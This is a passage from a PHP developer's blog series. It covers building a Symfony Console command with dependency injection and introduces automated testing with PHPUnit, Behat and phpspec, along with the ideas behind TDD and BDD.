$this->filesystem->dumpFile($path, $content);
$this->logger->notice(sprintf('Created file %s', $path));
}
}
As you can see, the DocumentationWriter isn't very big. It might seem
overkill, but now it's easy to write tests which will check if the LICENSE
file has been created. Also, in fossil the class does a bit more work: it
checks if the file already exists, and takes a "force overwrite" option into
account.
You'll also notice that we inject a logger to notice the user of what happens. We need to install the PSR-3 logger interface:
$ composer require "psr/log:~1.0"
Our command will now be much thinner, just like any controller should be (MVC can also be applied in CLI):
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Gnugat\Fossil\DocumentationWriter;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Logger\ConsoleLogger;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
class LicenseCommand extends Command
{
// configure method...
protected function execute(InputInterface $input, OutputInterface $output)
{
$path = $input->getOption('path').'/LICENSE';
$license = implode(' ', array(
'Copyright (c)',
$input->getArgument('author'),
$input->getArgument('year'),
));
$filesystem = new Filesystem();
$logger = new ConsoleLogger($output);
$documentationWriter = new DocumentationWriter($filesystem, $logger);
$documentationWriter->write($path, $license.PHP_EOL);
}
}
To be fair, our command is longer. But it is thinner as it now has less responsibilities:
If you run again ./fossil license "Loïc Chardonnet" "2013-2014" -p="/tmp",
you won't see anything: ConsoleLogger hides informative messages by default.
You need to pass the verbose option to see the message:
$ ./fossil license -v "Loïc Chardonnet" "2013-2014" -p="/tmp"
The dependency creation isn't a responsibility a controller should have. We'll delegate this to the Dependency Injection component:
$ ./composer.phar require "symfony/dependency-injection:~2.4"
We'll also install the Config component:
$ ./composer.phar require "symfony/config:~2.4"
If you don't know yet this component, go read this helpful article.
We'll create a XML file to configure the registration of our services:
<?xml version="1.0" ?>
<!-- File: config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="symfony.application"
class="Symfony\Component\Console\Application">
<argument key="name">Fossil</argument>
<argument key="version">2.0.0</argument>
<call method="add">
<argument type="service" id="fossil.license_command" />
</call>
</service>
<service id="fossil.license_command" class="Gnugat\Fossil\LicenseCommand">
<argument type="service" id="fossil.documentation_writer" />
</service>
<service id="fossil.documentation_writer" class="Gnugat\Fossil\DocumentationWriter">
<argument type="service" id="symfony.filesystem" />
<argument type="service" id="symfony.console_logger" />
</service>
<service id="symfony.filesystem" class="Symfony\Component\Filesystem\Filesystem">
</service>
<service id="symfony.console_logger" class="Symfony\Component\Console\Logger\ConsoleLogger">
<argument type="service" id="symfony.console_output" />
</service>
<service id="symfony.console_output"
class="Symfony\Component\Console\Output\ConsoleOutput">
</service>
</services>
</container>
As you can see, I've delegated every construction to the DIC (Dependency Injection Container), even the construction of the application. Now the command looks like this:
<?php
// File: src/Gnugat/Fossil/LicenseCommand.php
namespace Gnugat\Fossil;
use Gnugat\Fossil\DocumentationWriter;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class LicenseCommand extends Command
{
private $documentationWriter;
public function __construct(DocumentationWriter $documentationWriter)
{
$this->documentationWriter = $documentationWriter;
parent::__construct();
}
protected function configure()
{
$this->setName('license');
$this->setDescription('Bootstraps the license file of your project');
$this->addArgument('author', InputArgument::REQUIRED);
$this->addArgument('year', InputArgument::REQUIRED);
$this->addOption('path', 'p', InputOption::VALUE_REQUIRED, '', getcwd());
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$path = $input->getOption('path').'/LICENSE';
$license = implode(' ', array(
'Copyright (c)',
$input->getArgument('author'),
$input->getArgument('year'),
));
$this->documentationWriter->write($path, $license.PHP_EOL);
}
}
And the console now contains the DIC initialization:
#!/usr/bin/env php
<?php
// File: fossil
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
require __DIR__.'/vendor/autoload.php';
$container = new ContainerBuilder();
$loader = new XmlFileLoader($container, new FileLocator(__DIR__.'/config'));
$loader->load('services.xml');
$output = $container->get('symfony.console_output');
$application = $container->get('symfony.application');
$application->run(null, $output);
And voilà! You now know how to create CLI applications :) .
The Console component allows you to create CLI applications. The commands are a thin layer which gathers the input and call services. Those services can then output messages to the user using a special kind of logger.
Although this article was a bit long, I might have missed something here, so if you have any feedbacks/questions, be sure to contact me on Twitter.
]]>This article concludes the series on Tests:
I've tried to put as much general information and references to blogs which could help you to go further, in each article. In this final post, I'll regroup those references and the conclusions.
A test is a way to check if something behaves correctly. This something is called a System Under Test (SUT) and can be:
Generally, you proceed as follow:
When doing unit tests, you'll need to isolate your SUT from its collaborators (the dependencies, the other classes used by it). To do so, you'll need test doubles and Dependency Injection.
Frameworks can help you to automate your tests. You'll generally find these tools:
Note: xUnit frameworks allows many kinds of tests (they're not limited to unit tests).
Note: WebDriver is an API for Selenium, a java server which allows you to interract with a browser.
A process in which:
This allows you to naturally have a 100% test coverage, and it has the side effect of making your code more decoupled (you need your code to be decoupled in order to test it).
About writing the code as quickly as possible, commiting any sins:
BDD is divided in two sections: spec and story. It comes from the lack of direction in TDD and introduces the concept of business value.
Behat and phpspec allows you to automate the process by allowing you to:
Automated tests allow you to make sure your system isn't full of bug, and help to detect any regressions.
Theres many kinds out there: you can test what the user sees, what the computer sees and what the product owner expects.
I'd be really glad if this cheat sheet was of some use to you. If you have any comments, you can contact me on Twitter :) .
I had great feedbacks about the Behat article: which were triggered by the following statement: "if you're using Mink or Selenium, then you're doing it wrong". Let me re-phrase that.
If you're using Selenium or Mink, then you're doing integration tests, not behavior ones. Those tools are fine: the UI is what the user sees and interacts with, so it's important to make sure it isn't broken.
What isn't fine is to use Behat with these tools and then to say that you're doing BDD. Use the right tools for the job: PHPUnit can perfectly be used with selenium, and libraries like webdriver allow you to work with selenium without using Behat.
One of the question raised was: "If I can't interract with the UI, how do I test the behavior of my application?"" Well there's many ways and the answer deserves a whole article or even a whole series! I'll just give you the douchebag (it's the actual application name, I mean no offense!) example:
Inner conclusion: make a distinction between integration (HTML, UI, etc) and Behavior (business value, acceptance criteria from user stories) tests. If you can't do both, then the choice is yours: which one is the most important to you?
]]>This article is part of a series on Tests in general and on how to practice them:
Story Behavior Driven Development (BDD) is all about making user story's acceptance criteria executable. In this article we'll oversee Behat a PHP framework which enables you to do so.
In a nutshel Behat reads your user stories and links each steps in acceptance criteria to a function. The execution of those functions will then ascertain if the acceptance criteria succeeded.
To be able to read the user story, Behat needs you to write it in a specific format.
By default, your user stories are located as follow: /features/*.feature.
They're written using the Gherkin language,
which looks like this:
Feature: <user story title>
In order to <business value to attain>
As a/an <actor>
I need to <requirements to meet>
Scenario: <acceptance criteria title>
Given <precondition>
When <event>
Then <outcome>
The first lines will be printed while executing the acceptance criteria. The
Scenario keyword starts a new criteria. The Given, When and Then
keywords will trigger a search for a related test method. Those are called
steps.
Your criteria will most likely have more than three lines. You can use And and
But keywords to link the steps:
Feature: <user story title>
In order to <business value to attain>
As a/an <actor>
I need to <requirements to meet>
Scenario: <acceptance criteria title>
Given <precondition>
And <another precondition>
When <event>
But <another event>
Then <outcome>
And <another outcom>
But <yet another outcome>
Note: to be fair, Given, When, Then, But and And keywords aren't
different to Behat: the choice is there for you, in order to make your
acceptance criteria more readable.
The test methods should be placed in a context: /features/bootstrap/FeatureContext.php.
It looks like this:
<?php
use Behat\Behat\Context\BehatContext;
class FeatureContext extends BehatContext
{
/**
* @Given /^a sentence from an acceptance criteria$/
*/
public function aTestMethod()
{
// Your test code.
}
}
When Behat reads your user stories, for each step it will look in your context
and check the test method's annotations (comments starting by @Given, @When
or @Then) to see if it matches.
Note: again, @Given, @When and @Then don't really matter. If you write
Given I am an imp in your user story, and then write a test method with the
annotation @When /^I am an imp$/, it will match!
As you can see, a regexp is used for the matching, but since the version 3.0 (still in release candidate at the time I write this article) you can use plain text with placeholders:
/**
* @Given I am an/a :type
*/
public function setType($type)
{
// Your test code.
}
This has been borrowed from Turnip.
Note: your test method name can be anything, it doesn't have to match the step sentence.
When a test method is executed, it can have the following state:
To set the pending state, write the following in your method:
throw new \Behat\Behat\Tester\Exception\Pending();
As you can see, if you write the test method, but put nothing in it, then the test will succeeds. The responsibility to make the success state match business expectations is yours.
Behat eats its own dog food: its tests are written with itself! Which means you can have a look at them to inspire yourself. You'll see something that isn't written in the documentation: you can use PHPUnit's assertion methods to make your test pass or fail.
Remember how phpspec generates your code based on your specifications? Well it's the same thing with Behat.
First Bootstrap your context:
behat --init
Write a /features/<user-story>.feature file.
Next run the tests. For the pending steps, behat will propose you a template code which can be copy/pasted in your test methods:
behat
Then complete your test methods.
And finally run your tests:
behat
The tests should all fail. Which means now you can start writting the code to make it pass: it's Behavior Driven Development, remember? ;)
A lot of people hate Behat because it's slow and it needs Selenium to work, which isn't easy to install (if a novice can't install it, then it's not easy). Oh, and they hate it because the tests written with it aren't maintenable.
Guess what? They're wrong. They're probably using the mink extension, which enables you to write things like:
Feature: User registration
In order to gain access to the website
As a user
I need to register
Scenario: Giving account details
Given I fill the field "#username" with "John"
And I fill the field "#password" with "Doe"
When I submit the form "ul.form-block > li:last > #submit"
And I wait until the page is fully loaded
Then I should see "You've registered successfully"
The thing is, you're not describing the business value in this acceptance criteria. You're describing User Interface (UI) interractions. And it's completly different!
So here's my rule of thumb: don't use mink nor selenium. In Silex, an implementation detail, the advice given is: imagine you need to add a CLI which shares the same functionnalities than the web interface. It would be a shame to have to re-write all your acceptance tests, wouldn't it?
Behat enables you to make your acceptance criteria executable, and automates the process. Awsome!
If you're using Selenium, or the mink extension, then you're doing it wrong: don't test the UI, test the business value.
Here's my workflow advice:
I hope you enjoyed this article, be sure to tweet me what you think about it ;) .
Story BDD and Behat have a steep learning curve, which makes them hard to practice in the beginning (but totally worth it). To help you get your own way, here's a list of references:
And of course have a look at the references from my BDD article.
]]>This article is part of a series on Tests in general and on how to practice them:
In this article, we'll talk about Behavior Driven Development (BDD), again. There's no special skills required to read on, although some notions on tests and Test Driven Development (TDD) would be a plus.
So TDD has 3 simple rules:
Like many TDD oficionados, Dan North felt that it was missing some guidelines. To fix this, he created spec BDD, which adds the following rules to TDD:
it_should instead of test)One of his colleagues, Chris Matts, suggested to take BDD a step further: why not making sure the business value was met? And that's how story BDD was created.
If you're working with agile methodologies, you should be familiar with user stories. Those are simple cards which describe what to do in 3 lines:
In order to attain a business value
As an actor
I need to meet some requirements
They've also some acceptance criteria, which follow approximately this template:
Given a context
When an event happens
Then an outcome should occur
If the system fulfills the acceptance test, then it behaves correctly. By making them executable, you can test the business behavior of your system! That's what story BDD is all about.
Technically, this means parsing the acceptance tests and match each line with a chunk of code. But don't worry about implementation details, we'll see them in the next article.
Somehow, a surprising number of people started to think that BDD was all about integration tests. For example in a web application, they would write:
Given I am on "/home"
When I click on "form#name_form input[name=submit]"
And I wait until the page is fully loaded
Then the "form#name_form input[name=first_name]" form field should contain "value"
What's wrong with it? Well:
Here's a better approach:
Given the opportunity to introduce myself
When I give my name
Then I should be greeted
Yep, that's the story BDD example of "Hello World", in case you didn't recognize it ;) .
If you make a user story's acceptance tests executable, then you're doing story BDD. It helps you to make sure that your application meets your business needs.
Hopefully this article helped you a little. If you have any questions, rants or praises, feel free to send them to me on Twitter.
Tests are hard. TDD is harder. BDD even more! Here's some good references to help you on story BDD:
]]>This article is part of a series on Tests in general and on how to practice them:
The last article might have seemed too abstract. Fortunately, this one will be much more concrete! We'll present phpspec, a spec BDD tool for PHP.
phpspec automates the Test Driven Development (TDD) and spec BDD process by:
It also forces you to follow good practices:
It also tries to be less verbose, as you'll see in the next sections.
Simply install phpspec using Composer:
composer require --dev 'phpspec/phpspec:~2.0@RC'
At the time I write this article, phpspec is in Release Candidate, but don't worry: I've been using it since the beta version and I've never had any trouble.
First, bootstrap and complete the specification:
phpspec describe 'Fully\Qualified\Classname'
$EDITOR spec/Fully/Qualified/ClassnameSpec.php
Then bootstrap and complete the code to make the tests pass:
phpspec run
$EDITOR src/Fully/Qualified/Classname.php
phpspec run
Finally refactor, but keep the tests passing:
$EDITOR src/Fully/Qualified/Classname.php
phpspec run
I've found that Marcello Duarte, the creator of phpspec, talks really well about it in his presentation Test, transform, refactor.
I advise you to have a look at his slides, as they explain everything you should now about the red, green, refactor cycle.
Surprisingly, the documentation is complete and small:
There's nothing missing in these docs!
Unlike PHPUnit, phpspec uses an external library for its test doubles: prophecy (but you can still find how to use it in the documentation).
phpspec generates specification and code boilerplates for you. It forces you to concentrate on the class behavior rather than on the implementation and it provides a non verbose API. Even its documentations is complete and small!
I hope you enjoyed this article, be sure to tweet me what you think about it ;) .
]]>Reference: see the reference article
This article is part of a series on Tests in general and on how to practice them:
In this article, we'll talk about Behavior Driven Development (BDD). There's no special skills required to read on, although some notions on although some notions on tests and Test Driven Development (TDD) would be a plus.
Dan North, a fervent TDDist, felt that there was something missing about this practice:
While being an adapt of the concept, he felt that there was missing some important guidelines, and that his tests didn't answered the right questions.
Around 2006, he wrote an article called introducing BDD, in which he explained his unease and how to fix it: instead of writing tests from a technical point of view he decided to write them from a business point of view.
The first step to test the behavior of a class is to write a specification. Because xUnit frameworks were in vogue, developers had the habit of making a parallel between their Systems Under Test (SUT) and their Test Suites:
Test to name the Test Suitetest to name the Test Suite's methodsIn the Software world, a lot of problems can be solved by giving descriptive names. And this is what Dan North did: Test Suites became Specification. Why? Because it forces you to say "this method should do this" instead of writting "test method".
To be more precise, Dan Nort stated that "test method names should be sentences". Which means that test method names should be snake_cased, as underscores give more spaces to words (they're basically spaces).
And that's pretty much it!
Yes! Well, no. I mean... This is only the first part of BDD: it's called specBDD (guess why ;) ). I'll write about the second part (story BDD) in a future article.
BDD is just TDD, but tests become specifications and test methods are sentences which start with "it_should".
I hope you enjoyed this article. If you want to make any comment, you're welcome to do so on Twitter.
To keep good habits, in the next article we'll switch to the technical mode and see some phpspec!
]]>The first two articles didn't require special skills whereas the last one needed you to be a little bit used to tests. Well the next ones will require you to be a little bit used to Test Driven Develoment (TDD), so this article is here to make you practice them!
I really mean it: reading articles on TDD might feel good, but the only thing to do to fully grasp them is to:
In other word: just do it! The learning curve is steep, so dive into it as soon as possible.
One of the best way to learn is to pair with someone who's used to it. If you don't have someone to pair with, you can always read this Extreme Programming Episode by Robert C. Martin and Robert S. Koss.
The next article will be about the next level: Behavior Driven Development (BDD).
]]>Unlike the two previous articles, this one requires some experience in testing. While Test Driven Development (TDD) oficionados would tell you that on the contrary this is the way to learn tests, I'd rather advise you to practice them a little bit before hand, so you can fully grasp the interest of this principle.
In this article, we'll cover:
TL;DR: jump to the conclusion.
Test Driven Development (TDD) is a simple principle stating that we should:
It is also described as red, green, refactor to reflect the state of the tests
after being run in the end of each step. Well the last step should still be
green, but it wouldn't be self explicit if we said red, green, green wouldn't
it?
Kent Beck is considered to be the father of TDD, even though this practice must have been used before, especially because he wrote the 'bible' Test Driven Development by Example and also because he created the eXtreme Programming methodology (which integrates TDD into its practices).
TDD mostly applies to unit tests, but it could be used for any kind of test.
Each step has a purpose, which we'll discover.
So, why would we write the test before the code? The idea behind this is to write a piece of software which will describe how to use the future code: when writing the test, you're not bothered with implementation details and will naturally create the API (the public methods).
The first consequence to this step is having a meaningful code coverage: no need for tools to inspect which lines of code are executed when running the test in order to make sure the code is properly tested (those tools aren't effective anyway).
The second one is better design: to write tests you need the code to be decoupled. Writing tests firts forces you to make those decoupling decision early. Decoupled code should be easier to re-use, read and maintain.
As depicted by Ian Cooper, this step is the duct tape progammer's one: in order to make the freshly written test pass, every sin should be commited. Every design, clean code and best practice concerns should be put aside so the test passes as quickly as possible.
Why so much fuss about all this ugly code? The main reason is speed, to answer all criticism about how long tests take to be written.
With this, the school of pragmatic programmers and scholar ones can finally be reunited: as a matter of fact, while this step is all about the first "clan", the refactoring step is all about the second one.
To illustrate the fact that sometimes the clean solution comes to mind once the dirty has been written, here's a quote from the Eloquent Javascript book:
A student had been sitting motionless behind his computer for hours, frowning darkly. He was trying to write a beautiful solution to a difficult problem, but could not find the right approach. Fu-Tzu hit him on the back of his head and shouted 'Type something!' The student started writing an ugly solution. After he had finished, he suddenly understood the beautiful solution.
Now that we have sin, we have created a technical debt. The third and last step of TDD, refactoring, is all about managing this debt.
The rules here is to step back a little bit, consider how we can improve the structure of the code to make it simpler, more readable and if there's anything which can be extracted to be reused.
Once this consideration is done, then we can start moving the code at the only condition that we don't break the tests. It also means that the tests shouldn't be modified.
Writing first the test allows a complete and meaningful code coverage, a more decoupled code and a more natural API (public methods).
Then allowing every sins to write as quickly as possible the code to make the test pass allows to speed up development through pragmatic decisions.
Finally refactoring without touching the tests allows to get rid of the technical debt created in the previous step, depending on the estimated time left for the task.
Unfortunately TDD comes with a quite steep learning curve, but hey! You don't get something for nothing!
I hope you enjoyed this article, if you'd like to make any comments about it (either good or bad), please feel free to do so on Twitter.
There's been many criticism about TDD, and most of those are simply misconceptions. If you're part of the sceptics, check if your argument is listed in Jason Gorman's article.
The next article is about actually doing TDD.
]]>This article can be read by any regular developer (no special level required), we'll put some code on the principles we've previously seen and we'll have a quick look on existing tools. Here's what we'll cover:
TL;DR: jump to the conclusion.
In order to automate your tests (whether they're unitary, functionnal or anything else), you'll need to use some tools. These would be libraries helping you doing assertions, or libraries helping you creating test doubles without writing any new classes, or even frameworks which group those libraries together.
Most of the test frameworks follow the xUnit convention, which have been (accidently?) created by Kent Beck. Those are composed of:
Those are, among a ton of others:
You could aslo find Behavior Driven Development (BDD) style test frameworks:
I won't talk about these, as it will be the subject of a future article (there's so much to say about them).
Full stack frameworks isn't the only thing around here to help you write tests, there also are some libraries:
Choose your weapon wisely!
I mainly code in PHP, and in this language PHPUnit is the most popular test framework. It's been there for so long (version 1.0.0 released in July 2006) that almost any libraries and frameworks are tested with it. So it'll be our tool for the next examples.
You can install it using Composer:
curl -sS https://getcomposer.org/installer | php # Download composer
composer install "phpunit/phpunit:~3.7"
php vendor/bin/phpunit -h
Note: if you don't know Composer, let's just say that it makes your life easier by downloading for you the libraries you told him to (it takes care of selecting the good versions and can update them to get bug fixes). It also autoloads your classes so you don't have to require them.
Now that you have the latest stable version, you'll need to configure it:
<?xml version="1.0" encoding="UTF-8"?>
<!-- File: phpunit.xml -->
<phpunit
backupGlobals="false"
colors="true"
syntaxCheck="false"
bootstrap="test/bootstrap.php"
>
<testsuites>
<testsuite name="Fossil Test Suite">
<directory suffix="Test.php">./test/</directory>
</testsuite>
</testsuites>
</phpunit>
This configuration tells PHPUnit to look (recursively) in the test directory
for files ending in Test.php. Those will be your test suites.
You'll need a bootstrap file in order to use composer's autoloader:
<?php
$loader = require __DIR__.'/../vendor/autoload.php';
$loader->add('Gnugat\\Fossil\\Test', __DIR__);
And voilà! You can now write your tests in test.
The common understanding of unit test is a symmetry between classes and tests: when you have a class with 2 methods, you need to have a test class for it which will test these two methods.
It looks like this wasn't the real meaning of the term unit, which should have meant making tests which can be run in any order without ruinning them, and as many times as wanted. Fortunately a new kind of test was created to fix this misunderstanding, so let's stick with the common one.
Imagine you have the following class, which creates a file if it doesn't already exist:
<?php
// File: src/MarkdownFile/DocumentationWriter.php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->filesystem->exists($absolutePathname)) {
$this->filesystem->dumpFile($absolutePathname, $content);
}
}
}
Note: once again the code samples are taken from fossil, have a look at this article to discover what it is.
In order for it to be autoloaded, you'll need to edit your composer.json file:
{
"require": {
"phpunit/phpunit": "~3.7"
},
"autoload": {
"psr-4": {
"Gnugat\\Fossil": "src/"
}
}
}
To test it, we could run it and check if the file has been created with the
given content, but that would be testing Symfony2's Filesystem which
happens to be already tested.
So what does our class adds to it? Well it calls Filesystem to check if the
file exists, and if not it calls again the Filesystem to create it. We could
check if those calls are made using stubs and mocks.
Reminder: stubs are a substitute of an object which forces it to return a given value. When a System Under Test (SUT, the class you're testing) has collaborators (classes used by the SUT, also called dependencies), we can stub them so their behavior is completly controlled.
Reminder: mocks are a substitute of an object which checks if its methods have been called. When a System Under Test (SUT, the class you're testing) has collaborators (classes used by the SUT, also called dependencies), we can mock them to monitor their use.
PHPUnit allows us to create stubs and mocks without having to write a class which extends the colaborator and overwrites its methods:
<?php
// File: test/MarkdownFile/DocumentationWriterTest.php
namespace Gnugat\Fossil\Test\MarkdownFile;
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;
class DocumentationWriterTest extends \PHPUnit_Framework_TestCase
{
const FIXTURE_ABSOLUTE_PATHNAME = '/tmp/example.txt';
const FIXTURE_CONTENT = "Hello world\n";
public function setUp()
{
$this->filesystem = $this->getMock('Symfony\\Component\\Filesystem\\Filesystem');
$this->documentationWriter = new DocumentationWriter($this->filesystem);
}
public function testWriteNewFile()
{
// Stub
$this->filesystem->expects($this->any())
->method('exists')
->with(self::FIXTURE_ABSOLUTE_PATHNAME)
->will($this->returnValue(true))
;
// Mock
$this->filesystem->expects($this->once())
->method('dumpFile')
->with(
$this->equalTo(self::FIXTURE_ABSOLUTE_PATHNAME),
$this->equalTo(self::FIXTURE_CONTENT)
)
;
// Call
$this->documentationWriter->write(
self::FIXTURE_ABSOLUTE_PATHNAME,
self::FIXTURE_CONTENT
);
}
}
In the stub: for every call (expects($this->any())) of the method exists
with the parameter self::FIXTURE_ABSOLUTE_PATHNAME, force the colaborator to
return true.
In the mock: a unique call must be made (expects($this->once())) of the method
dumpFile with the two parameters self::FIXTURE_ABSOLUTE_PATHNAME and
self::FIXTURE_CONTENT.
You can run the test using php vendor/bin/phpunit and see that they pass. As
an exercise, write a second method in this test suite
testDoesNotWriteExistingFile, with a stub returning false and a mock checking
that dumpFile is never called (hint).
I advise you to watch extract till you drop, a nice refactoring session by Mathias Verraes: in order to improve his code, he writes tests which give him enough confidence to proceed. He uses PHPUnit with assertions, mocks and stubs, so you can really see their use.
Unit tests are used in order to make sure each unit of code works as expected.
But applications aren't just about code, they're also about interactions
between these units. This is what functional tests are for: they use the entry
point of the system and check the final status code.
To illustrate this, we'll still use PHPUnit: even though there's the word unit
in its name, this test framework allows us to write many types of tests.
The Symfony2 web framework is all about the HTTP protocol: it takes a HTTP Request and returns a HTTP Response. It also provides a convenient client which simulates HTTP Requests, allowing us to write easily functional tests:
<?php
// File: src/Acme/DemoBundle/Tests/Controller/DemoControllerTest.php
namespace Acme\DemoBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class DemoControllerTest extends WebTestCase
{
public function testIndex()
{
$client = static::createClient();
$client->request('GET', '/demo/hello/Fabien');
$this->assertSame(
Response::HTTP_OK,
$client->getResponse()->getStatusCode()
);
}
}
The assertSame line is an assertion: it compares the expected value (first
argument) with the actual one (second one). PHPUnit provides many assertions:
assertSame is equivalent to === (type and value comparison)assertEquals is equivalent to == (loose value comparison)assertFileExists checks if the given filename corresponds to an exisitng fileDifferent approaches exist with assertions, for example jasmine uses the
expect method to set the actual value, chained with a matcher like toBe
which takes the expected value:
describe("A suite", function() {
it("contains spec with an expectation", function() {
var expectedValue = true;
var actualValue = true;
expect(actualValue).toBe(expectedValue);
});
});
In this case, assertions are splitted into expectations and matchers.
Back to our sheeps. Here's an example of functional test for a Symfony2 command:
<?php
// File: src/Acme/DemoBundle/Tests/Command/GreetCommandTest.php
namespace Acme/DemoBundle/Tests/Command;
use Symfony\Component\Console\Tester\CommandTester;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Acme\DemoBundle\Command\GreetCommand;
class ListCommandTest extends WebTestCase
{
public function testExecute()
{
$kernel = $this->createKernel();
$kernel->boot();
$application = new Application($kernel);
$application->add(new GreetCommand());
$command = $application->find('demo:greet');
$commandTester = new CommandTester($command);
$commandTester->execute(
array(
'name' => 'Fabien',
'--yell' => true,
)
);
$exitSuccess = 0;
$this->assertSame($exitSuccess, $commandTester->getStatusCode());
}
}
Just like with a controller where we check the HTTP Response's status code, in a command we check the exit status code.
Up until now, we've been testing that the code worked and that interractions between all those units go well. But what about the thing the user actually sees and interacts with?
The User Interface (UI) turns out to be tricky to test, but not impossible. You can click on buttons, or load pages, or run CLI tasks programmatically and you can inspect the standard output or the HTTP Response's content.
The main problem with this is that you'll tie your tests to the UI, which changes a lot.
We'll see briefly the tools available and then better explain the flaws of such a technique.
Selenium allows you to open a browser and simulates interractions with the page. Technically it means having a Selenium server running in the background, and using a webdriver library in your test to send messages to it. In PHP, you can find those webdrivers:
You can find code samples in the respective documentation of each library, for example here's the doc describing how to click on a button with Alexandre's one.
If you're curious, here's how to use Selenium with another test framework: Codeception.
You don't like the idea of running a server in order to run your tests? You don't want a browser to be openned and you find it too slow?
Then you might want to try a headless website testing solution like CasperJs. It's headless because it won't open a browser to make the tests.
Here's the get started documentation, so you can have a quick look on how to use it.
Simulating a browser is too much for you? Making a curl request and parsing its response would be sufficient for your needs? Then have a look at the Goutte web scrapper.
This one also allows you to click on links.
One Tool to rule them all, One Tool to find them, One Tool to bring them all and in the webness bind them
Mink can use either Goutte or Selenium as a driver to interract with the UI. It's goal is to provide a unified API.
The thing in common with all these tools is that they rely on the HTML rendered
in the HTTP Response. In order to check if a message appears, you'll have to
crawl the page, find the div using its class or id in a CSS selector, or even
worse using its xpath.
When the page will change (and it will) your tests will be broken. There's some best practices out there, mainly making your tests rely on ID's on one hand and making your code and stylesheets rely on classes on the other hand, but in the end it still is a risky business.
Well that's my opinion and this section might be more a rant than an objective description. To counter balance this, here's a nice article on writing reliable locators for Selenium and WebDriver tests.
In PHP, PHPUnit is the most popular test framework and it allows you to write unit, functional and every other kinds of tests.
Unit tests allow you to make sure each functions return the expected output when given a set of fixtures, and functional tests are used to check the status code (think HTTP response, or a command's exit status).
Stubs are used to force a colaborator's method to return a wanted value, and mocks are used to check if a colaborator's method have been called.
Selenium is the most popular tool to test the User Interface, which is done by interracting with the HTML rendered in the HTML's reponse.
I hope this article helped you to see how each kinds of tests are written. The next one will be on Test Driven Development, a practice where tests are written before the code: TDD.
If there's something bothering you in this post, or if you have a question, or if you want to give me your opinion, be sure to do so on Twitter ;) .
]]>This introduction can be read by anyone (no special level required) and it targets those who've never heard about tests, or those you've never really practice them. Here's what we'll cover:
TL;DR: jump to the conclusion.
A test is a way to check if part of the system is working. Let's say you just
wrote the strlen function: it takes a string as argument and returns its
length. To make sure it works correctly, you might have created a script file
which looked like this:
<?php
echo strlen('We'); // Should print 2
echo strlen('are'); // Sould print 3
echo strlen('the knights'); // Should print 11
echo strlen('who say "Ni"!'); // Should print 13
This script (which you might have thrown away once satisfied with the printed result) is a test. It makes sure your function works correctly by providing it with different inputs and comparing its output with the expected one.
This test is not really efficient, but it does the work. Let's see how to improve it in the following sections.
Tests can be grouped under 3 categories:
The first one is when you use your software to see if it works correctly. This is the worst kind of test because systems can be so complex that some part will enventually be forgoten, and therefore not checked.
Incidentally, this is what happens everyday when users use your product, except you're not sure if they'll report the bugs they see (and for each bug discovery you can potentially lose them).
Why do I mention it, if it's so bad? Because it's still usefull to discover bugs on parts which haven't been correctly covered by the other kinds of tests. Actually this is the kind of tests which are done during beta-tests: you get a restricted set of (volunteer) users to use your product and see if everything is fine.
Let's take a scientific approach to the first kind of tests by writing test plans which describe use cases with their expected outcome.
Everytime someone tests the system, they follow the scenario given to them. This is an improvement of the previous approach as there's less risk of forgoting a step which is written.
Those tests are generally followed (more or less rigorously) during acceptance testing at the end of developments by the customer or product owner or even better by Quality Assurance (QA).
The problem with the two previous categories is that they require humans, and to err is human. The software industry was partly created to automate repititive tasks, so how about we automate those tests?
The simplest way of automating test is to use assertions:
<?php
$input = 'We are no longer the knights who say "Ni"!';
$expectedOutput = 42;
$output = strlen($input);
echo ($expectedOutput === $output ? 'Test pass' : 'Test fails');
If you keep this script, you can run it regurarly, which means the risk of forgoting a step is almost near zero! I say almost because the test doesn't magically cover every use case: human still have to write them, which lets a small room for errors to happen, but this is the best we can do.
As you can see, automated tests are constructed very simply:
We've seen the 3 big categories of tests. But that's not quite it: whether it's automated or not, your tests can target many levels/layers in your application:
Note: this classification has been taken from Jean François Lépine's slides
Each of those tests can be executed manually, or can be automated.
There's so many types of tests out there, and so little of us to write them! Depending on your team, competences, project and planning, you won't be able to write every possible tests.
I'm afraid you'll have somehow to chose which kind of test is more suitable for you project. As a matter of fact, testing everything isn't wise:
<?php
class User
{
private $name;
public function __construct($name)
{
$this->name = $name;
}
public function getName()
{
return $this->name;
}
}
// Is this test really usefull? I think not!
$input = 'Johann Gambolputty de von Ausfern -schplenden -schlitter -crasscrenbon -fried -digger -dangle -dungle -burstein -von -knacker -thrasher -apple -banger -horowitz -ticolensic -grander -knotty -spelltinkle -grandlich -grumblemeyer -spelterwasser -kürstlich -himbleeisen -bahnwagen -gutenabend -bitte -eine -nürnburger -bratwustle -gerspurten -mit -zweimache -luber -hundsfut -gumberaber -shönendanker -kalbsfleisch -mittler -raucher von Hautkopft of Ulm.';
$expectedOutput = $input;
$user = new User($input);
$output = $user->getName();
echo ($expectedOutput === $output ? 'Test pass' : 'Test fails');
In the upper code sample, we're testing if the getter returns a value which haven't been modified. Sure you could introduce a typo while sketching the class, but once you've manually tested it a first time there's no need to check regularly if it still works in the future.
